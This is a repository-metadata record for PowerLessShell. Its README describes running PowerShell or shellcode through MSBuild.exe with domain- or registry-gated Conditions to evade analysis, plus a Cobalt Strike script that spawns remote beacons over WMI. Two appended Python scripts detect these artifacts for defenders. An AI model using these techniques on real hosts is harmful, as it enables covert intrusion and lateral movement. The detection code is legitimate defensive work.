{"id":13844329,"url":"https://github.com/Mr-Un1k0d3r/PowerLessShell","last_synced_at":"2025-07-11T22:31:28.940Z","repository":{"id":37256099,"uuid":"92781462","full_name":"Mr-Un1k0d3r/PowerLessShell","owner":"Mr-Un1k0d3r","description":"Run PowerShell command without invoking powershell.exe","archived":false,"fork":false,"pushed_at":"2023-03-23T13:30:14.000Z","size":130,"stargazers_count":1507,"open_issues_count":2,"forks_count":255,"subscribers_count":57,"default_branch":"master","last_synced_at":"2025-05-23T00:07:40.072Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Mr-Un1k0d3r.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2017-05-29T23:03:52.000Z","updated_at":"2025-05-20T06:36:55.000Z","dependencies_parsed_at":"2022-07-12T04:31:08.911Z","dependency_job_id":"768b6741-c2f2-4610-b902-bf9caef5a6b8","html_url":"https://github.com/Mr-Un1k0d3r/PowerLessShell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Mr-Un1k0d3r/PowerLessShell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FPowerLessShell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FPowerLessShell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FPowerLessShell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FPowerLessShell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Mr-Un1k0d3r","do
wnload_url":"https://codeload.github.com/Mr-Un1k0d3r/PowerLessShell/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FPowerLessShell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264909966,"owners_count":23682096,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:02:40.436Z","updated_at":"2025-07-11T22:31:28.663Z","avatar_url":"https://github.com/Mr-Un1k0d3r.png","language":"Python","readme":"# PowerLessShell\n\nPowerLessShell relies on MSBuild.exe to execute PowerShell scripts and commands (locally, or remotely via the bundled Aggressor script) without spawning powershell.exe. 
\nYou can also execute raw shellcode using the same approach.\n\n# MSBuild conditions\n\nMSBuild supports a Condition attribute that can be used to skip a target, and the code it contains, when the condition is not met.\n\n```\n\u003cTarget Name=\"x\" Condition=\"'$(USERDOMAIN)'=='RingZer0'\"\u003e\n```\n\nThe malicious code is only executed if the current user's domain is \"RingZer0\"; on any other host the target is skipped.\n\nConditions support several other forms, such as registry lookups, that can be used to build more specific execution checks.\n\n```\n\u003cTarget Name=\"x\" Condition=\"'$(registry:HKEY_LOCAL_MACHINE\\blah@blah)'\u003e='0'\"\u003e\n```\n\nProperty functions also expose data that can be used in a condition.\n\n```\nhttps://docs.microsoft.com/en-us/visualstudio/msbuild/property-functions\n```\n\n# Usage\n\nPowerLessShell uses command-line arguments to generate the final MSBuild project file.\n\n```\n$ python PowerLessShell.py -h\nPowerLessShell Less is More\nMr.Un1k0d3r RingZer0 Team\n-----------------------------------------------------------\nusage: PowerLessShell.py [-h] [-type TYPE] -source SOURCE -output OUTPUT\n                         [-arch ARCH] [-condition CONDITION]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -type TYPE            Payload type (shellcode/powershell) default to:\n                        shellcode\n  -source SOURCE        Path to the source file (raw shellcode or powershell\n                        script)\n  -output OUTPUT        MSBuild output filename\n  -arch ARCH            Shellcode architecture (32/64) default to: 32\n  -condition CONDITION  XML Compiling condition default (Check for USERDOMAIN)\n                        default is: none\n```\n\nGenerating a PowerShell payload\n```\n$ python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj\nPowerLessShell Less is More\nMr.Un1k0d3r RingZer0 Team\n-----------------------------------------------------------\nGenerating the msbuild file using include/template-powershell.csproj as the template\nFile 'malicious.csproj' 
created\nProcess completed\n```\n\nGenerating a shellcode payload\n```\n$ python PowerLessShell.py -source shellcode.raw -output malicious.csproj\nPowerLessShell Less is More\nMr.Un1k0d3r RingZer0 Team\n-----------------------------------------------------------\nGenerating the msbuild file using include/template-shellcode.csproj as the template\nFile 'malicious.csproj' created\nProcess completed\n```\n\nGenerating a 64-bit shellcode payload\n```\n$ python PowerLessShell.py -source shellcode64.raw -output malicious.csproj -arch 64\nPowerLessShell Less is More\nMr.Un1k0d3r RingZer0 Team\n-----------------------------------------------------------\nGenerating the msbuild file using include/template-shellcode.csproj as the template\nGenerating a payload for a 64 bits shellcode! Don't forget to use the 64 bits version of msbuild.exe\nFile 'malicious.csproj' created\nProcess completed\n```\n\n# Cobalt Strike Aggressor script (wmi_msbuild.cna)\nBy Alyssa (ramen0x3f) and MrT-F\n### Set Up\n* Either copy the PowerLessShell folder to [Cobalt Strike working dir]/PowerLessShell or make note of its path\n* If you did not copy it into the Cobalt Strike directory, edit the $pls_path variable in wmi_msbuild.cna to point to PowerLessShell\n* Load the script into Cobalt Strike\n\n### Usage\n```\ncheck_msbuild -target TARGET   \t\tVerify .NET 4.0.30319 is installed (should see \"Status OK\")\n\t[-user user] [-pass pass]\t\tWindows 7 has .NET 4.0.30319 after 3 reboots and 4 Windows update cycles\n\nrename_msbuild -target TARGET \t\tCopy MSBuild.exe. \n\t-msbuild newname \n \t[-path C:\\new\\path] \t\tDefault - C:\\Users\\Public\\\n\t[-user domain\\username]\t\tSpecifying user/pass spawns cmd on remote host.\n \t[-pass password]\t\t\t\n\nwmi_msbuild -target TARGET \t\t \tSpawn new beacon. 
\n         -listener LISTENER\n\t[-payload new_file]\t\t \tDefault - [a-zA-Z].tmp\n\t[-directory new_dir]\t\t\tDefault - C:\\Users\\Public\\\n\t[-msbuild alt_msbuild_location] \t\n\t[-user USERNAME] [-pass PASSWORD]\t\n\t[-manualdelete]\t\t\t\tSwitch doesn't auto delete payload.\n```\n### OpSec Notes\nSpawns cmd.exe on the target system if\n* ManualDelete switch is not set\n* rename_msbuild is run with a username/password specified\n\n# Credit\nMr.Un1k0d3r RingZer0 Team 2017\n\n","funding_links":[],"categories":["Python (1887)","Python","Operating Systems"],"sub_categories":["Windows"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMr-Un1k0d3r%2FPowerLessShell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FMr-Un1k0d3r%2FPowerLessShell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMr-Un1k0d3r%2FPowerLessShell/lists"}
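The README's "MSBuild conditions" and "Usage" sections describe the generated artifact: an MSBuild project whose inline code task hosts PowerShell (or maps shellcode) and whose Target is gated by a Condition such as a USERDOMAIN or registry check. The following Python is an added example written for this page, not code from the PowerLessShell project: it parses an MSBuild project with the standard library and reports the features a defender triages for, inline CodeTaskFactory/RoslynCodeTaskFactory tasks, PowerShell-hosting or native-memory APIs inside the inline code, and environment, registry or property-function guard conditions. The two project files are constructed for the example and carry no real payload; the indicator lists are the author's assumptions about what is worth flagging, not a complete signature set.

```python
"""Static triage of MSBuild project files for condition-gated inline tasks.

Added example (not part of the PowerLessShell project). Parses a .csproj with
xml.etree and reports inline code tasks, suspicious API use inside them, and
guard Conditions of the kind the README describes.
"""
import re
import xml.etree.ElementTree as ET

# Strings whose presence inside inline task code is worth flagging (assumed indicator set).
CODE_INDICATORS = {
    "powershell_host": re.compile(r"System\.Management\.Automation|PowerShell\.Create\(|RunspaceFactory", re.I),
    "native_memory":   re.compile(r"VirtualAlloc|CreateThread|WriteProcessMemory|Marshal\.Copy", re.I),
    "base64_blob":     re.compile(r"FromBase64String|[A-Za-z0-9+/]{200,}={0,2}"),
}
# Condition forms the README presents as execution guards, plus property functions.
COND_INDICATORS = {
    "env_guard":      re.compile(r"\$\((USERDOMAIN|USERDNSDOMAIN|COMPUTERNAME|USERNAME)\)", re.I),
    "registry_guard": re.compile(r"\$\(registry:", re.I),
    "property_func":  re.compile(r"\$\(\[[A-Za-z0-9.]+\]::", re.I),
}

def _local(tag):
    """Strip the MSBuild XML namespace (present or not) from an element tag."""
    return tag.rsplit("}", 1)[-1]

def triage_project(xml_text):
    """Return findings for one MSBuild project file given as XML text."""
    root = ET.fromstring(xml_text)
    findings = {"inline_tasks": [], "conditions": [],
                "code_indicators": set(), "condition_indicators": set()}
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "UsingTask" and "CodeTaskFactory" in el.get("TaskFactory", ""):
            # Matches both CodeTaskFactory and RoslynCodeTaskFactory.
            findings["inline_tasks"].append(el.get("TaskName", "?"))
        elif tag == "Code":
            body = el.text or ""           # CDATA content is returned as plain text
            for name, rx in CODE_INDICATORS.items():
                if rx.search(body):
                    findings["code_indicators"].add(name)
        cond = el.get("Condition")
        if cond:
            findings["conditions"].append((tag, cond))
            for name, rx in COND_INDICATORS.items():
                if rx.search(cond):
                    findings["condition_indicators"].add(name)
    return findings

def is_suspicious(findings):
    """Inline task + PowerShell-host or memory API is the pattern; a guard
    condition is an evasion signal on top of it, not a requirement."""
    return bool(findings["inline_tasks"]) and bool(findings["code_indicators"])

# Constructed sample: the shape of a USERDOMAIN-gated inline task, not a real payload.
SAMPLE_PROJECT = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="x" Condition="'$(USERDOMAIN)'=='RingZer0'">
    <RunPS />
  </Target>
  <UsingTask TaskName="RunPS" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs"><![CDATA[
        using System.Management.Automation;
        public class RunPS : Microsoft.Build.Utilities.Task {
          public override bool Execute() {
            using (PowerShell ps = PowerShell.Create()) { ps.AddScript("Get-Date").Invoke(); }
            return true;
          }
        }
      ]]></Code>
    </Task>
  </UsingTask>
</Project>"""

# Constructed benign project for contrast: has a Condition but no inline code.
BENIGN_PROJECT = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup Condition="'$(Configuration)'=='Release'"><Optimize>true</Optimize></PropertyGroup>
  <Target Name="Build"><Message Text="hello" /></Target>
</Project>"""

if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_PROJECT), ("benign", BENIGN_PROJECT)):
        f = triage_project(text)
        print(label, "suspicious" if is_suspicious(f) else "clean", f)
```

Run it against a directory of .csproj/.proj/.targets files pulled from a host; a Condition alone (the benign project above) is ordinary build logic, so the verdict keys on the inline task and its code, and the condition indicators are reported separately as context for the analyst.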
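The Aggressor section describes the runtime artifacts of the remote workflow: MSBuild.exe copied under a new name into C:\Users\Public\ by rename_msbuild, a payload written as a random [a-zA-Z].tmp file, and the beacon launched over WMI. The following Python is an added example for this page, not part of PowerLessShell or wmi_msbuild.cna: it scores constructed Sysmon-style process-creation records (the field names Image, OriginalFileName, CommandLine and ParentImage are assumed from Sysmon Event ID 1) for those artifacts. The three events are constructed for the example, and the "user-writable path" list is an assumption a team would tune to its own environment.

```python
"""Process-creation triage for renamed or misplaced MSBuild.exe launches.

Added example, not part of PowerLessShell. Field names follow Sysmon Event ID 1
(assumed); OriginalFileName comes from the PE version resource, so it still
reads MSBuild.exe after the binary is copied under another name.
"""
import ntpath
import re

# Assumed list of locations where an unprivileged user can drop files.
USER_WRITABLE = re.compile(r"^(C:\\Users\\|C:\\ProgramData\\|C:\\Windows\\Temp\\)", re.I)
PROJECT_EXT = re.compile(r"\.(csproj|vbproj|proj|targets|sln)$", re.I)

def extract_project_arg(cmdline):
    """Return the first non-switch argument after the image: MSBuild's project file."""
    tokens = re.findall(r'"([^"]*)"|(\S+)', cmdline)   # quoted tokens may contain spaces
    args = [quoted or bare for quoted, bare in tokens][1:]
    for a in args:
        if not a.startswith(("/", "-")):
            return a
    return None

def score_event(ev):
    """Return the list of reasons an MSBuild launch looks like the wmi_msbuild pattern."""
    reasons = []
    if ev.get("OriginalFileName", "").lower() != "msbuild.exe":
        return reasons                                   # not MSBuild, whatever it is called
    image = ev.get("Image", "")
    if ntpath.basename(image).lower() != "msbuild.exe":
        reasons.append("renamed_msbuild")
    if USER_WRITABLE.match(image):
        reasons.append("msbuild_outside_framework_dir")
    proj = extract_project_arg(ev.get("CommandLine", ""))
    if proj:
        if not PROJECT_EXT.search(proj):
            reasons.append("non_project_extension")      # e.g. the [a-zA-Z].tmp default
        if USER_WRITABLE.match(proj):
            reasons.append("project_in_user_writable_path")
    if ntpath.basename(ev.get("ParentImage", "")).lower() == "wmiprvse.exe":
        reasons.append("wmi_parent")
    return reasons

# Constructed events: one developer build, one wmi_msbuild-style launch, one
# unrenamed MSBuild fed a generated project from a temp directory.
LEGIT = {
    "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
    "OriginalFileName": "MSBuild.exe",
    "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" C:\src\app\app.csproj /p:Configuration=Release',
    "ParentImage": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
}
RENAMED = {
    "Image": r"C:\Users\Public\svchost_upd.exe",
    "OriginalFileName": "MSBuild.exe",
    "CommandLine": r"C:\Users\Public\svchost_upd.exe C:\Users\Public\kqzT.tmp",
    "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
}
TEMP_CSPROJ = {
    "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
    "OriginalFileName": "MSBuild.exe",
    "CommandLine": r"MSBuild.exe C:\Users\bob\AppData\Local\Temp\malicious.csproj",
    "ParentImage": r"C:\Windows\System32\cmd.exe",
}

if __name__ == "__main__":
    for name, ev in (("legit", LEGIT), ("renamed", RENAMED), ("temp_csproj", TEMP_CSPROJ)):
        print(name, score_event(ev))
```

Keying on OriginalFileName rather than the image name is what survives rename_msbuild; the project-file checks catch the un-renamed case where malicious.csproj is simply run from a temp or Public directory, which is the shape the generator's own usage examples produce.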